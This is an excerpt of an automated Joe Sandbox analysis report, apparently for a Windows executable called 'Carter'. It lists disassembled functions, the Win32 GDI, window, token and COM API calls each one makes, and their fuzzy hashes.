                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0103BDBA
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0103BDF2
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0103BE18
                                                                        • _wcsstr.LIBCMT ref: 0103BE22
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: 5b683edde84299b5fe3f5c874f1e4203e6f250739c31f0fe6749b4f0a7c724bd
                                                                        • Instruction ID: f1a017897b09ac01d012fe868cd357f234e017aa809c06f11e2d2b27998c7c30
                                                                        • Opcode Fuzzy Hash: 5b683edde84299b5fe3f5c874f1e4203e6f250739c31f0fe6749b4f0a7c724bd
                                                                        • Instruction Fuzzy Hash: B5210732604244BAFB26AB3DDC08E7F7BDDDF89760F108069F989DA185EB71C8008761
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0106B804
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0106B829
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0106B841
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0106B86A
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0105155C,00000000), ref: 0106B888
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 59376cb3b63e6f7e27bfae2e41f2ecf10caf41634b45abdd73c048c1a28216de
                                                                        • Instruction ID: ac8a72db9604a9c518b7bb6c96c041ac304cef4dd203f3f27674c48ec927e6b8
                                                                        • Opcode Fuzzy Hash: 59376cb3b63e6f7e27bfae2e41f2ecf10caf41634b45abdd73c048c1a28216de
                                                                        • Instruction Fuzzy Hash: 6D21A1B1A10215AFDB609E3CCC04B6A3BE8FB05720F244778FAA6D31D5E7358810CB90
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 01056159
                                                                        • GetForegroundWindow.USER32 ref: 01056170
                                                                        • GetDC.USER32(00000000), ref: 010561AC
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 010561B8
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 010561F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 63a432fd3ec4802353ff3cd0d4b39df615ba0e3c56f19d41f8f542981315a4aa
                                                                        • Instruction ID: bacb92bcdf8f19048c97b016a149564b99edc952288d07b3b6b204dcc3b920b0
                                                                        • Opcode Fuzzy Hash: 63a432fd3ec4802353ff3cd0d4b39df615ba0e3c56f19d41f8f542981315a4aa
                                                                        • Instruction Fuzzy Hash: 1821A175A00204AFD710EF65DC84AAABBF9EF89711F048479F98AD7256CA35AC40CB90
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE1729
                                                                        • SelectObject.GDI32(?,00000000), ref: 00FE1738
                                                                        • BeginPath.GDI32(?), ref: 00FE174F
                                                                        • SelectObject.GDI32(?,00000000), ref: 00FE1778
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: c8da5cc1d594b80524875d8eaabde2bd299d85c12c501147a70773d7714518da
                                                                        • Instruction ID: d95b72d93314fb61b4f2dcc599b720c99f4820ffa0d54bc8dde99d333ddc9f45
                                                                        • Opcode Fuzzy Hash: c8da5cc1d594b80524875d8eaabde2bd299d85c12c501147a70773d7714518da
                                                                        • Instruction Fuzzy Hash: E221F531D00648EFDB219F26D8047693BF9F700721F648316F895A2198D37B9991DF90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        • Opcode ID: 840530391b4da2c7aa8c567e08f157b0a9fd84cf6fa41779129f6e620712d78f
                                                                        • Instruction ID: 358c88aa0cbbe4e8cf3eae4c467bf1f51a14fa4968e34e09a7f1acd95527f9c6
                                                                        • Opcode Fuzzy Hash: 840530391b4da2c7aa8c567e08f157b0a9fd84cf6fa41779129f6e620712d78f
                                                                        • Instruction Fuzzy Hash: CF01B972B041097BF21567165E81FFB735CAEA5264F04402AFEC6EA742EB60DF1182E5
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01045075
                                                                        • __beginthreadex.LIBCMT ref: 01045093
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 010450A8
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 010450BE
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 010450C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                        • String ID:
                                                                        • API String ID: 3824534824-0
                                                                        • Opcode ID: 2e8767b81e56030710cecf9292bb6b788093ab07b5777b3dfa6ba8f6505e9690
                                                                        • Instruction ID: 36f5ee39fc251d261e2f078e0bb0114c3a2c31cef0adc5b9189dadb7ea7cecb6
                                                                        • Opcode Fuzzy Hash: 2e8767b81e56030710cecf9292bb6b788093ab07b5777b3dfa6ba8f6505e9690
                                                                        • Instruction Fuzzy Hash: 6F1108B6904708BBD7618BA89C44A9B7FACEB85320F544369F994E3344D677890487F0
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01038E3C
                                                                        • GetLastError.KERNEL32(?,01038900,?,?,?), ref: 01038E46
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,01038900,?,?,?), ref: 01038E55
                                                                        • HeapAlloc.KERNEL32(00000000,?,01038900,?,?,?), ref: 01038E5C
                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01038E73
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: a9b3ca13f9adec1f2cb4c74468240d8f6c4d92ddcb8153bd271bcd174a92de75
                                                                        • Instruction ID: daf40185fef961ce5f5de5979da9e0dca0aceadcb1525859e474946b31fd39b0
                                                                        • Opcode Fuzzy Hash: a9b3ca13f9adec1f2cb4c74468240d8f6c4d92ddcb8153bd271bcd174a92de75
                                                                        • Instruction Fuzzy Hash: 3F0112B1601304BFDB214FA9DC48D6B7FADEF8A75572046AAF989D2114D6769800CB70
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0104581B
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01045829
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01045831
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0104583B
                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01045877
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 37d29efb73ba79a423ea229cd1245603992f0ae415ace29ac8bf38d678701955
                                                                        • Instruction ID: 58d593772451f26356d81a3ed895b533ae6f970a60b4c0f32120be447bfc8bb1
                                                                        • Opcode Fuzzy Hash: 37d29efb73ba79a423ea229cd1245603992f0ae415ace29ac8bf38d678701955
                                                                        • Instruction Fuzzy Hash: 4E015B71C016199BEF10AFE8EC889EDBBB8BB0D711F00416AE581B2148CF359550CBA1
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?,?,01038073), ref: 01037D45
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?), ref: 01037D60
                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?), ref: 01037D6E
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?), ref: 01037D7E
                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?), ref: 01037D8A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: e366a851b5a28bd2e8fb5cabbf17924506f8ad6370194602116e947cc57c67f5
                                                                        • Instruction ID: 8df54ef5afdef8a6b33a19e9741eccfa9895d8b5ed5ba201bb627588c0840e71
                                                                        • Opcode Fuzzy Hash: e366a851b5a28bd2e8fb5cabbf17924506f8ad6370194602116e947cc57c67f5
                                                                        • Instruction Fuzzy Hash: 7C0171B2A01204BBDB615F58DC48BAEBFFDEB85751F144154FA88E6208D776DD00CBA0
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01038D3F
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01038D49
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D58
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D5F
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D75
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: c26739b6501d21fbbc69c7fa6464fec8f45026aca436f2114c316a5175beff28
                                                                        • Instruction ID: 4ad1e99732e361c9b4de5ab9f902157c8c424d136bc2f94dc548e3a28c539c87
                                                                        • Opcode Fuzzy Hash: c26739b6501d21fbbc69c7fa6464fec8f45026aca436f2114c316a5175beff28
                                                                        • Instruction Fuzzy Hash: 9FF0AF30200204AFEB621EA8EC8CE673BACEF8A654F044266F984D6144CB669900DB60
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01038CDE
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01038CE8
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01038CF7
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01038CFE
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01038D14
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: c206579b011d52bdb7f9e2763a26ffecee3fb314492d8cf416f620b9421ad8e8
                                                                        • Instruction ID: 19c60625bfc2eb8541928b358e7f746dfd6f3a126784e5954d64c7edd3b33e73
                                                                        • Opcode Fuzzy Hash: c206579b011d52bdb7f9e2763a26ffecee3fb314492d8cf416f620b9421ad8e8
                                                                        • Instruction Fuzzy Hash: 02F0AF30200204AFEF611EA8AC8CE673BACEF8A654F108666F984D2144CA66D800DB60
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0103CD90
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0103CDA7
                                                                        • MessageBeep.USER32(00000000), ref: 0103CDBF
                                                                        • KillTimer.USER32(?,0000040A), ref: 0103CDDB
                                                                        • EndDialog.USER32(?,00000001), ref: 0103CDF5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: e5e416825de67094379fc5e5ed8d1dff03a4fd660ff6f34521a1a37752b50989
                                                                        • Instruction ID: 5feb94e10ed54f95f01a0ef6752dc4f8e189929424b28212fd22523fe794b828
                                                                        • Opcode Fuzzy Hash: e5e416825de67094379fc5e5ed8d1dff03a4fd660ff6f34521a1a37752b50989
                                                                        • Instruction Fuzzy Hash: B3018F70900708ABFB316B24DE5EBA67BACBB45701F00069AF6C2B10D5DBE5A544CB80
                                                                        APIs
                                                                        • EndPath.GDI32(?), ref: 00FE179B
                                                                        • StrokeAndFillPath.GDI32(?,?,0101BBC9,00000000,?), ref: 00FE17B7
                                                                        • SelectObject.GDI32(?,00000000), ref: 00FE17CA
                                                                        • DeleteObject.GDI32 ref: 00FE17DD
                                                                        • StrokePath.GDI32(?), ref: 00FE17F8
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: ea0711aa35bb5c6f2f20e175c6412c5dc227ad15223f6585b311a93b4cf87033
                                                                        • Instruction ID: 927e33843b550ef56f94d03ce123c8043cc30d6e82a54ac7969a2f94f47fea68
                                                                        • Opcode Fuzzy Hash: ea0711aa35bb5c6f2f20e175c6412c5dc227ad15223f6585b311a93b4cf87033
                                                                        • Instruction Fuzzy Hash: 99F01931440A48ABDB325F27E80CB593BA5B701732F54C314F4A9541E8D73B4995EF50
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0104CA75
                                                                        • CoCreateInstance.OLE32(01073D3C,00000000,00000001,01073BAC,?), ref: 0104CA8D
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • CoUninitialize.OLE32 ref: 0104CCFA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                        • String ID: .lnk
                                                                        • API String ID: 2683427295-24824748
                                                                        • Opcode ID: f580b9a0fee65e7e30bea679dafc1a8441ae58d6cfcb99baf8c687b7d2605e04
                                                                        • Instruction ID: 82a884514b3c909b33e1e1a3de8fb57f4bb840ca3a62945483c490cdf736a433
                                                                        • Opcode Fuzzy Hash: f580b9a0fee65e7e30bea679dafc1a8441ae58d6cfcb99baf8c687b7d2605e04
                                                                        • Instruction Fuzzy Hash: 98A13BB1504245AFD310EF64CC81EABB7E8FF94714F00491CF5959B2A2EB75EA09CB92
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 00FF1680: _memmove.LIBCMT ref: 00FF16DB
                                                                        • __swprintf.LIBCMT ref: 00FEE598
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FEE431
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 1943609520-557222456
                                                                        • Opcode ID: 02fa231012bc6a25ab9298bb7bdd2ef2d551632544e2799075a303662945d567
                                                                        • Instruction ID: 550f859a4b2efde0cfeab132d6341efd1a81575d09baa06f6d03a50d15c1024f
                                                                        • Opcode Fuzzy Hash: 02fa231012bc6a25ab9298bb7bdd2ef2d551632544e2799075a303662945d567
                                                                        • Instruction Fuzzy Hash: 1E919B715083559FD724EF24EC85CBEB7A8BF95310F04091DF6869B2A1EA34EA04DB92
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 010052CD
                                                                          • Part of subcall function 01010320: __87except.LIBCMT ref: 0101035B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
